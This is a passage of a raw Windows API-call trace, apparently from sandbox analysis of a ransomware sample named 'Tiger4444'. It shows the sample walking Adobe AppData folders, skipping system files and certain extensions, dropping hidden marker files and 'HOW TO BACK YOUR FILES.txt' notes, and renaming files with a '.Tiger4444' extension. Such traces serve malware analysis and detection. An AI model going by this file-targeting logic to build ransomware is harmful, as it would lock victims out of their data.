(lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0058.433] CloseHandle (hObject=0x2c4) returned 1 [0058.434] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2") returned 51 [0058.434] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.434] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715ca081, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7894b39b, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x87d928a6, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0058.434] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.434] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.434] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0058.434] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.434] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715ca081, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7894b39b, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x87d928a6, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.434] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.434] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.434] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0058.434] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.434] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.434] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x87d6c68f, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x87d6c68f, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x87d928a6, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0058.434] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.435] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0058.435] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7894b39b, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x6606ebca, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x6606ebca, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0058.435] lstrcmpiW (lpString1="Logs", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0058.435] lstrcmpiW (lpString1="Logs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.435] lstrcmpiW (lpString1="Logs", lpString2="Tiger4444.exe") returned -1 [0058.435] lstrcmpiW (lpString1="Logs", lpString2=".") returned 1 [0058.435] lstrcmpiW (lpString1="Logs", lpString2="..") returned 1 [0058.435] lstrcmpiW (lpString1="Logs", lpString2="windows") returned -1 [0058.435] lstrcmpiW (lpString1="Logs", lpString2="bootmgr") returned 1 [0058.435] lstrcmpiW (lpString1="Logs", lpString2="pagefile.sys") returned -1 [0058.435] lstrcmpiW (lpString1="Logs", lpString2="boot") returned 1 [0058.435] lstrcmpiW (lpString1="Logs", lpString2="ids.txt") returned 1 [0058.435] lstrcmpiW (lpString1="Logs", lpString2="NTUSER.DAT") returned -1 [0058.435] lstrcpyW (in: lpString1=0x30aeb10, lpString2="Logs" | out: lpString1="Logs") returned="Logs" [0058.435] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666c0 [0058.435] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x72) returned 0xc83a10 [0058.435] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc666c8 | out: ListHead=0xc66828, ListEntry=0xc666c8) returned 0xc66568 [0058.435] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78917ee8, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x78917ee8, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x658d53ae, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LogTransport2.cfg", cAlternateFileName="LOGTRA~1.CFG")) returned 1 [0058.435] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0058.435] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.435] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="Tiger4444.exe") returned -1 [0058.435] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2=".") returned 1 [0058.435] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="..") returned 1 [0058.435] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="windows") returned -1 [0058.435] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="bootmgr") returned 1 [0058.435] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="pagefile.sys") returned -1 [0058.435] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="boot") returned 1 [0058.436] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="ids.txt") returned 1 [0058.436] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="NTUSER.DAT") returned -1 [0058.436] lstrcpyW (in: lpString1=0x30aeb10, lpString2="LogTransport2.cfg" | out: lpString1="LogTransport2.cfg") returned="LogTransport2.cfg" [0058.436] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg", dwFileAttributes=0x0) returned 1 [0058.437] lstrlenW (lpString="LogTransport2.cfg") returned 17 [0058.437] lstrlenW (lpString="Tiger4444") returned 9 [0058.437] lstrcmpiW (lpString1="port2.cfg", lpString2="Tiger4444") returned -1 [0058.437] lstrlenW (lpString=".dll") returned 4 [0058.437] lstrcmpiW (lpString1=".cfg", lpString2=".dll") returned -1 [0058.437] lstrlenW (lpString=".lnk") returned 4 [0058.437] lstrcmpiW (lpString1=".cfg", lpString2=".lnk") returned -1 [0058.437] lstrlenW (lpString=".ini") returned 4 [0058.437] lstrcmpiW (lpString1=".cfg", lpString2=".ini") returned -1 [0058.437] lstrlenW (lpString=".sys") returned 4 [0058.437] lstrcmpiW (lpString1=".cfg", lpString2=".sys") returned -1 [0058.437] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\logtransport2\\logtransport2.cfg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0058.438] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0058.438] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14989075886) returned 1 [0058.438] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=216) returned 1 [0058.438] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0058.438] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0058.438] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3e0, lpName=0x0) returned 0x2cc [0058.439] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e0) returned 0xbe0000 [0058.512] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0058.512] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0058.512] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0058.512] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0058.512] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0058.512] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0058.513] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0058.513] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0058.513] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14996568656) returned 1 [0058.513] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0058.513] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0058.513] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0058.513] CloseHandle (hObject=0x2cc) returned 1 [0058.513] CloseHandle (hObject=0x2b8) returned 1 [0058.513] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg.Tiger4444") returned 79 [0058.513] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\logtransport2\\logtransport2.cfg"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\logtransport2\\logtransport2.cfg.tiger4444"), dwFlags=0x1) returned 1 [0058.514] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78917ee8, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x78917ee8, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x658d53ae, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LogTransport2.cfg", cAlternateFileName="LOGTRA~1.CFG")) returned 0 [0058.514] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0058.514] lstrcpyW (in: lpString1=0x30aeb10, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0058.514] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\logtransport2\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0058.514] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0058.514] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0058.514] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0058.514] CloseHandle (hObject=0x2b8) returned 1 [0058.515] CloseHandle (hObject=0x2c4) returned 1 [0058.515] GetCurrentThreadId () returned 0xfa8 [0058.515] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc666c8 [0058.515] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs" [0058.515] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc83a10 | out: hHeap=0xc50000) returned 1 [0058.515] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc666c0 | out: hHeap=0xc50000) returned 1 [0058.515] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs" [0058.515] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\" [0058.515] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\.BFC0E91B00AE8A0620D3" [0058.515] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\logtransport2\\logs\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0058.516] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0058.546] FlushFileBuffers (hFile=0x2c4) returned 1 [0058.547] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0058.548] CloseHandle (hObject=0x2c4) returned 1 [0058.548] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs") returned 56 [0058.548] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.548] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7894b39b, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x6606ebca, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x87e51539, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0058.548] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.548] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.548] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0058.548] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.548] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7894b39b, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x6606ebca, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x87e51539, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.548] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.548] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.548] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0058.549] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.549] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.549] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x87e51539, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x87e51539, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x87e9d952, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0058.549] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.549] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0058.549] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x87e51539, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x87e51539, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x87e9d952, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0058.549] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0058.549] lstrcpyW (in: lpString1=0x30aeb1a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0058.549] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\logtransport2\\logs\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0058.549] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0058.549] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0058.550] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0058.550] CloseHandle (hObject=0x2b8) returned 1 [0058.550] CloseHandle (hObject=0x2c4) returned 1 [0058.550] GetCurrentThreadId () returned 0xfa8 [0058.550] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66568 [0058.550] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics" [0058.550] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8f690 | out: hHeap=0xc50000) returned 1 [0058.550] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66560 | out: hHeap=0xc50000) returned 1 [0058.550] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics" [0058.550] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\" [0058.550] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\.BFC0E91B00AE8A0620D3" [0058.550] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\linguistics\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0058.551] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0058.553] FlushFileBuffers (hFile=0x2c4) returned 1 [0058.554] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0058.554] CloseHandle (hObject=0x2c4) returned 1 [0058.555] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics") returned 49 [0058.555] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.555] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715ca081, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715ca081, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x87e9d952, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f08 [0058.555] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.555] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.555] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0058.555] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.555] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715ca081, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715ca081, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x87e9d952, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.555] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.555] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.555] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0058.555] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.555] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.555] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x87e9d952, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x87e9d952, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x87ec3a9e, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0058.555] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.555] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0058.555] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x87e9d952, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x87e9d952, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x87ec3a9e, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0058.555] FindClose (in: hFindFile=0xc72f08 | out: hFindFile=0xc72f08) returned 1 [0058.555] lstrcpyW (in: lpString1=0x30aeb0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0058.555] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\linguistics\\how to back your files.txt"), dwDesiredAccess=0xc0000000, 